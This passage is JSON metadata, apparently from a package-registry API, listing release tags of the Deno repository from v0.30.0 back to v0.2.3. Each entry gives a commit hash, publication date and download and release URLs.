":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/rele